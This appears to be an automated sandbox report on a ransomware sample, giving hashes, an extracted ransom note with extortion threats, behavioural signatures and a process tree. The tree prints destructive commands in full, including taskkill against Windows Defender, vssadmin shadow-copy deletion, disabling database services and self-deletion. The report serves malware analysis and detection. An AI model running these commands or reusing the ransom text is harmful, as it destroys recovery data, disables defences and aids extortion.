Analysis

  • max time kernel
    4265020s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    15/01/2022, 12:32

General

  • Target

    enc.exe

  • Size

    156KB

  • MD5

    14ee62fcc9163509856671400429ad55

  • SHA1

    7544332b52769ca853d900669ef5e272a2ae1665

  • SHA256

    699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd

  • SHA512

    4d71c87be6f6ad7c9f3277b60850cd7136cecfd5f15621d1e56b1897008da8cc742578112ea955f8417c8d4cf13bcfb92e7ceafb34720017b47d81c4d2603bff

Malware Config

Extracted

Path

C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt

Ransom Note
--=== Hello. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. All sensitive information also leaked. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should send sample to us to decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise-time is much more valuable than money. [+] How to contact us? [+] You have two ways: 1) [Recommended] Using an email Just write us an email to [email protected] 2) Quick contact with us or if you will not receive our letters download qTox and ADD our TOXID: F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F How to download QTOX: - https://tox.chat/download.html - https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe Add our mails to contacts so as not to lose letters from us. Check your spam sometimes, our emails may get there. [+] Consequences if we do not find a common language [+] 1. The data were irretrievably lost. 2. Leaked data will be published or sold on blmarket (or to competitors). 3. In some cases, DDOS attacks will be applied to your inftastructure. !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! Your UserID: A8DAA6A16D8C8BB312F43209F7AB95E5296A10A3D87024CB934A585CB5507644CB5E6A77BC8280358F92FAEC6E4E930722214A95E70C211752067D825DF7BEF09C0A7FDE70F8AAFE6E29B2B935D40DCE664D830E118C38182BE7C9395FFFCE5CAC105B1CF2112639BC49E8177B22ADAC766C2B6222FC985C6828E7908EB8436672CDE2A3767C5C90007FDCC9FCAFE356EFB2D13759DCF330C325F0795184B169A98D0CA85DF495083ED5F5A9682B433202D4D32434F58AF3C48AEEA6AD7804648CD109D13DBCA7850DDFD357A6DC2607E268298B5EE920E583DFFA0158C3A6B6BCA0CE48997B683086A920023EBA8F671F7F117802128A12EC741C66D86CD0B63082010A0282010100B82716F0ADD557A53005A5A7C413681A0589B311245C52F35CDE173723523E067D7B27380E11E6E9B1F6D1A8A89294E1966D9FBDA22976D3091AF91D7FFD18A9746440BEF74B05CF88707106D16D3019F124F633EC1A5E6615BB0555788AED81105CB6C835CF58721295A1C60E595604308160C43ED863A1170593FA7E031FBB018C6EB90B039A6A6DC6E98A0494924EC66C9292E4C4261C8823B5E9D892AF1E095DD3096E68A119330D0C7D1E909EF08A9627B46E899D7DB9724BC3B7AF8D4B732C4233EDBFE86493ED0B7286E47A930783D9762C583EA19965EACE30D4C11A6EBF588FFC9BF677D95782B1EADACE7EF731E3D69A3E01E2486C8361BD5B5B6702030100012DEF1E66AEBA0015F148138EF6EE89584B464B4850
URLs

https://tox.chat/download.html

https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Disables taskbar notifications via registry modification
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Windows security modification 2 TTPs 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\enc.exe
    "C:\Users\Admin\AppData\Local\Temp\enc.exe"
    1⤵
    • Modifies extensions of user files
    • Windows security modification
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3608
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /IM MSASCuiL.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2060
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
      2⤵
        PID:3276
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "echo OS INFO: > %TEMP%\DHPMDAPUF"
        2⤵
          PID:3408
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\DHPMDAPUF"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3228
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic OS get Caption,CSDVersion,OSArchitecture,Version
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2084
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "echo BIOS INFO: >> %TEMP%\DHPMDAPUF"
          2⤵
            PID:2256
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\DHPMDAPUF"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:780
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1544
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c "echo CPU INFO: >> %TEMP%\DHPMDAPUF"
            2⤵
              PID:1308
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\DHPMDAPUF"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3460
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
                3⤵
                  PID:3588
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\DHPMDAPUF"
                2⤵
                  PID:3280
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\DHPMDAPUF"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3872
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    wmic MEMPHYSICAL get MaxCapacity
                    3⤵
                      PID:2972
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\DHPMDAPUF"
                    2⤵
                      PID:3200
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\DHPMDAPUF"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:768
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
                        3⤵
                          PID:2976
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c "echo NIC INFO: >> %TEMP%\DHPMDAPUF"
                        2⤵
                          PID:2244
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\DHPMDAPUF"
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1372
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic NIC get Description, MACAddress, NetEnabled, Speed
                            3⤵
                              PID:1960
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c "echo DISKDRIVE INFO: >> %TEMP%\DHPMDAPUF"
                            2⤵
                              PID:3344
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\DHPMDAPUF"
                              2⤵
                                PID:4020
                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                  wmic DISKDRIVE get InterfaceType, Name, Size, Status
                                  3⤵
                                    PID:3364
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c "echo USERACCOUNT INFO: >> %TEMP%\DHPMDAPUF"
                                  2⤵
                                    PID:2196
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\DHPMDAPUF"
                                    2⤵
                                      PID:2256
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
                                        3⤵
                                          PID:1544
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c "echo IPCONFIG: >> %TEMP%\DHPMDAPUF"
                                        2⤵
                                          PID:3868
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c "ipconfig >> %TEMP%\DHPMDAPUF"
                                          2⤵
                                            PID:3908
                                            • C:\Windows\SysWOW64\ipconfig.exe
                                              ipconfig
                                              3⤵
                                              • Gathers network information
                                              PID:3924
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c "echo DATABASES FILES: >> %TEMP%\DHPMDAPUF"
                                            2⤵
                                              PID:1656
                                            • C:\Windows\SysWOW64\notepad.exe
                                              notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt
                                              2⤵
                                              • Opens file in notepad (likely ransom note)
                                              PID:2916
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\enc.exe"
                                              2⤵
                                                PID:2504
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 1.1.1.1 -n 1 -w 3000
                                                  3⤵
                                                  • Runs ping.exe
                                                  PID:1920
                                            • C:\Windows\system32\MusNotification.exe
                                              C:\Windows\system32\MusNotification.exe
                                              1⤵
                                              • Checks processor information in registry
                                              PID:1196

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads